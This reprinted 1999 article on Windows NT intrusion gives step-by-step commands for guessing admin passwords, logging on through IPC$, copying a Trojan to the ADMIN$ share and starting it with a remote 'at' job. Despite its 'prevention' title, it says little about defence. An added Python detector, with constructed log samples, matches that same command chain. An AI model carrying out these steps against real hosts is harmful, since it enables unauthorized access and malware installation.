Preventing Remote Intrusion on Windows NT

xiaoxiao2021-03-06  17

By Billows, 1999/03/12

Microsoft's Windows NT platform is all the rage for building networks, and many network systems now run on it, yet its vulnerabilities persist despite the patches Microsoft keeps publishing on the Internet. Whenever we apply a Microsoft patch, new vulnerabilities appear again. Using these vulnerabilities for remote intrusion over the network is also quite simple. Now let's take a look at how a Windows NT host is invaded.

First, the remote target has to be determined. The other side's IP address may already be known; otherwise a variety of scanning tools can find the IP address of the target machine. Since that is not the subject here, it is not covered further. After determining the target, the intruder uses Windows NT's own commands to obtain the remote target's user list, analyzes the list, and tries to obtain administrator privileges. The letmein command is used to log in to the server remotely with a specified password and read the user information on the server; with different parameters, the corresponding control can be obtained. For example:

    \\xxxx -admin -g mypwd
(views the list of administrators on \\xxxx and tries to get administrator control with the password that follows the parameter)

    -d mypwd
(attempts to obtain user control with the password that follows the parameter, and displays all usernames on \\xxxx)

Once the letmein command has yielded the relevant administrator privilege, standard commands provided by Windows are used to connect to the remote resources and copy a Trojan to the remote target. Any Trojan can be used; Trojans themselves are not introduced here. The specific commands are:

    net use \\xxxx\IPC$ "pass" /user:"user"
(logs in to the \\xxxx host with the username and password just guessed)

    copy x:\netserver.exe \\xxxx\admin$\system32
(copies the local Trojan netserver.exe to the administrator directory on the remote \\xxxx)

Legitimate Windows NT commands are then used to start the Trojan just copied over remotely:

    netsvc \\xxxx schedule /start
    at \\xxxx hh:mm netserver.exe /port:yourport /nomsg

The commands above use the Windows NT task scheduler to run the Trojan at the specified time on the specified port.

Another way is to run the Trojan through a URL, such as http://xxx/scripts/ntsrver.exe/port:YourPort or http://xxxx/cgi-gin/ntsrver.exe/port:YourPort, etc. At this point the invasion has succeeded, and the remote resource is under the intruder's control.

Cracking the administrator password with cracking tools takes only a few minutes.
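For defenders, the command sequence described above (IPC$ logon, copy to ADMIN$, Schedule service start, remote at job) leaves a recognizable trail wherever process command lines are recorded. The following is an added example, not code from the original article: it flags a source host that copies a file to a target's ADMIN$ share and then schedules a remote at job on the same target. The record layout (epoch seconds, source host, command line), the host names and the one-hour window are assumptions, and the sample records are constructed.

```python
import re
from collections import defaultdict

# Stage patterns taken from the command sequence described in the article.
STAGES = [
    ("ipc_logon",   re.compile(r'^\s*net\s+use\s+\\\\([^\\\s]+)\\ipc\$', re.I)),
    ("admin_copy",  re.compile(r'^\s*copy\s+\S+\s+\\\\([^\\\s]+)\\admin\$', re.I)),
    ("sched_start", re.compile(r'^\s*netsvc\s+\\\\([^\\\s]+)\s+schedule\s+/start', re.I)),
    ("remote_at",   re.compile(r'^\s*at\s+\\\\([^\\\s]+)\s+\d{1,2}:\d{2}\s+\S+', re.I)),
]

def classify(cmdline):
    """Return (stage, target_host) for a command line, or None."""
    for stage, rx in STAGES:
        m = rx.search(cmdline)
        if m:
            return stage, m.group(1).lower()
    return None

def find_chains(events, window_s=3600):
    """events: iterable of (epoch_seconds, source_host, cmdline).
    Flags each (source, target) pair where a copy to ADMIN$ is followed
    within window_s seconds by a remote 'at' job on the same target."""
    seen = defaultdict(list)            # (source, target) -> [(ts, stage)]
    for ts, src, cmd in sorted(events):
        hit = classify(cmd)
        if hit:
            seen[(src.lower(), hit[1])].append((ts, hit[0]))
    findings = []
    for (src, dst), hits in seen.items():
        copies = [t for t, s in hits if s == "admin_copy"]
        jobs = [t for t, s in hits if s == "remote_at"]
        if any(0 <= j - c <= window_s for c in copies for j in jobs):
            findings.append({"source": src, "target": dst,
                             "stages": sorted({s for _, s in hits})})
    return findings

# Constructed sample records (not real logs); hosts and times are made up.
SAMPLE = [
    (1000, "WS07", r'net use \\FILESRV\IPC$ "pass" /user:"user"'),
    (1060, "WS07", r'copy x:\netserver.exe \\FILESRV\admin$\system32'),
    (1100, "WS07", r'netsvc \\FILESRV schedule /start'),
    (1130, "WS07", r'at \\FILESRV 14:05 netserver.exe /port:yourport /nomsg'),
    (2000, "WS02", r'net use \\PRINTSRV\IPC$ /user:"ops"'),   # logon only
    (2100, "WS03", r'at \\BACKUP 02:00 backup.cmd'),          # job, no copy
]

if __name__ == "__main__":
    print(find_chains(SAMPLE))
```

Only the WS07 to FILESRV pair is reported; an IPC$ logon on its own or a scheduled job with no preceding ADMIN$ copy is not flagged, which keeps routine administration out of the findings.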

When reprinting, please cite the original address: https://www.9cbs.com/read-51077.html
